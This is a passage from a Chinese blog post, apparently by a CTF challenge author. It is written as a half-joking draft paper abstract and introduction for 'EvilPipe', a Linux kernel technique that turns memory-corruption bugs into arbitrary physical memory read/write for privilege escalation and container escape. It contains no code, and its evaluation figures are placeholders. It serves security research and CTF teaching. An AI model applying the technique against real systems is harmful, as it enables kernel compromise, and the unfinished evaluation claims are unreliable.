
笔者个人发疯部分，这里可以不用看了（笑）

最近写论文写得快疯魔了，所以笔者为这道题目也简单写了一段：）

《EvilPipe: Another General Exploitation Method On Linux kernel Vulnerabilities》

Abstract

在实战中对 Linux kernel 的内存损坏漏洞进行利用往往需要面临诸多挑战，来自硬件与软件层面的诸多保护使得漏洞利用变得困难，内核镜像信息的缺失也令合法攻击载荷的构造变得不可能；现有的一些工作也在尝试寻找无需进行控制流劫持的更具有通用性的攻击手法，如 Pipe Primitive 选择将漏洞形式转换为 DirtyPipe 完成利用，DirtyCred 则将漏洞转换为对内核中的 credentials 结构体的改写以完成利用；但这些利用手法往往仍需要一定级别的权限（例如，至少需要能够读取或执行特权文件），仍然缺乏足够的通用性

本文介绍 EvilPipe——一种更具有通用性的利用手法，这项技术允许我们将绝大多数的内核中的内存损坏漏洞（甚至仅是一个 ‘\0’ 字节的堆溢出），转换为无需任何特权的无限的对物理内存的任意读写能力，并能完美绕过包括 KASLR、SMEP、SMAP 在内的多项主流缓解措施；有了 EvilPipe，一个恶意的本地攻击者可以在无需内核镜像信息的情况下通过已知的内核漏洞完成提权与容器逃逸；我们在多个保护完备的 Linux 系统下对多个 （此处暂定） 真实世界中的漏洞完成了对这种利用手法的评估，并发现 EvilPipe 在多个 （此处暂定） 真实世界的漏洞上可以完成利用，这意味着这项技术的通用性；在完成可用性评估之后，我们提出了一种新的保护机制，通过在数据拷贝前添加额外的验证机制以防止 EvilPipe 类型的利用方法，经实验评估，我们所提出的新机制带来的负担是可以忽略不计的

KEYWORDS

OS Security; Kernel Exploitation; Privilege Escalation

1 INTRODUCTION

现如今 Linux 已然成为全世界最为流行的开源操作系统，得益于其开源的特性与优秀的设计，我们可以在包括云服务器、移动设备、物联网设备、网络基础设施在内的绝大部分设备上看到 Linux 内核的身影，而极高的流行性也令 Linux 吸引了无数网络攻击者与黑客们的兴趣。虽然 Linux 内核每年被爆出的漏洞高达数百个[3]，但在实战中对内核漏洞的利用往往面临着一系列困难的挑战。从内核层面而言，诸如 KASLR[1]、KPTI [2]、 CFI[4] 等保护为控制流劫持攻击增添了不少难度。从硬件层面而言， SMEP、SMAP、NX-bit 等保护也令形如 ret2usr[5]、ret2dir[5] 这样的攻击变得极为困难。内核镜像信息的缺失更是使得攻击者无法获取到内核代码片段的具体信息，从而使得类似 ROP/JOP 这样的利用手法难以被应用。

相较于劫持内核的执行流，在实战中更受人青睐的内核漏洞则是无需特定于某个内核二进制信息的逻辑类漏洞。曾经非常火热的 CVE-2016-5195（也被称为 “DirtyCOW”）便是一个非常经典的这样的逻辑漏洞，其通过 Linux 内核中的条件竞争漏洞完成对特权文件的越权写入以进行提权，而不需要直接对抗内核中的诸多安全机制，这使得这个漏洞能够适用于实战中的多个不同的复杂场景。CVE-2022-0847（也被称为“DirtyPipe”）由于其类似的通用性于去年在安全界变得流行，其为一个对 pipe 结构体中标志位的错误设置，这可以使得攻击者利用该漏洞完成对特权文件的越权写入以进行提权，而不需要直接对抗内核中的多种保护。

在本文中我们提出了一种更为通用、强大的利用方法，称之为 EvilPipe。这项技术利用了内核中管道结构体的可重分配性与高度灵活性，这允许我们将绝大多数的内核中的内存损坏漏洞（甚至仅是一个 ‘\0’ 字节的堆溢出），转换为无需任何特权的近乎无限的对物理内存的任意读写能力，这意味着我们可以通过这种利用方法获取对内核的完全控制权，从而无需直接对抗任何主流的保护措施便能完成内核提权与容器逃逸的工作。同时，这项技术并不需要任何更高的系统权限（例如，读取 /etc/passwd），也不依赖于系统环境中的任何特权文件（例如， pkexec），且不需要任何额外的特定于内核镜像的内核信息，这意味着我们可以在绝大部分存在已知漏洞的Linux系统上直接应用这种利用手法完成攻击，因此这种方法在实战当中具有极高的可用性。

相比于其他的利用技术， EvilPipe 有着如下优点。首先，EvilPipe 的核心仅是 pipe 系统调用，作为一个基础设施 pipe 系统调用在每一个基于 Linux 的系统上都是可以使用的，这意味着 EvilPipe 近乎不存在任何的使用门槛。其次，EvilPipe 有着高度的灵活性，可以完美契合多个不同大小的内核漏洞对象。对于 UAF 漏洞而言，EvilPipe 仅要求漏洞对象与通用的 GFP_KERNEL_ACCOUNT 分配标志位来自同一 kmem_cache（内核当中的大部分对象都满足该要求）。对于溢出漏洞而言，EvilPipe 的最低要求仅为一个 \0 字节（这同样适用于跨 kmem_cache 间内存页的溢出，我们将在后文使用一种名为页级堆风水的技术来完成它）。这意味着我们可以将绝大部分的内存损坏类漏洞转换为 EvilPipe 以完成利用。最后，EvilPipe 不直接与任何的内核保护措施进行对抗，也不需要关于当前内核的任何信息，且不会留下任何痕迹，这意味着 EvilPipe 可以被应用于近乎所有的攻击环境。

此外，我们认为 EvilPipe 并不仅代表针对 pipe 系统调用的利用方法，而是代表了与传统的漏洞利用技术所不同的研究方向：将内核漏洞利用方法从传统的代码执行转向构造逻辑漏洞，从而无需直接与众多内核保护措施进行直接对抗，并大幅减少漏洞利用对特定于指定环境的依赖度。我们认为在漏洞利用上这是一个值得令人探索的方向。

在完成概念验证之后，我们将多个 Linux 内核中的内存损坏漏洞改写为 EvilPipe，并在多个保护完备的 Linux 系统下对多个 （此处暂定） 真实世界中的漏洞完成了对这种利用手法的评估。我们发现 EvilPipe 在多个 （此处暂定） 真实世界的漏洞上可以完成利用，这意味着这项技术具有强大的能力。在完成可利用性评估之后，我们提出了一种新的保护机制，通过在数据拷贝前添加额外的验证机制以防止 EvilPipe 类型的利用方法，经实验评估，我们所提出的新机制带来的负担是可以忽略不计的。

总而言之，本文做了如下工作：

我们提出了一种新的通用利用技术——EvilPipe，这项技术允许我们将绝大多数的内核中的内存损坏漏洞（甚至仅是一个 ‘\0’ 字节的堆溢出），转换为无需任何特权的无限的对物理内存的任意读写能力

我们在多个真实世界的漏洞上应用了 EvilPipe ，这展示了其强大的通用性与易用性。同时我们发现了一些可能应用类似于 EvilPipe 的逻辑攻击手法的内核对象。

我们分析了 Linux 内核现有的防御机制在对抗逻辑漏洞上的不足，并提出了新的保护机制。我们对这项新机制进行了评估，发现其带来的负担是可以忽略不计的。

CTF

#信息安全 #Linux #Linux Kernel #Pwn #CTF #堆风水 #Heap Overflow #D^3CTF #Cross-Cache Overflow #Page-level Heap Fengshui

【CTF.0x08】D^ 3CTF2023 d3kcache 出题手记

https://arttnba3.github.io/2023/05/02/CTF-0X08_D3CTF2023_D3KCACHE/

作者

arttnba3

发布于

2023年5月2日

许可协议

【EBPF.0x00】eBPF 入门指北（一）：简介上一篇

【PAPER.0x02】论文笔记：Virtual Wall: Filtering Rootkit Attacks To Protect Linux Kernel Functions 下一篇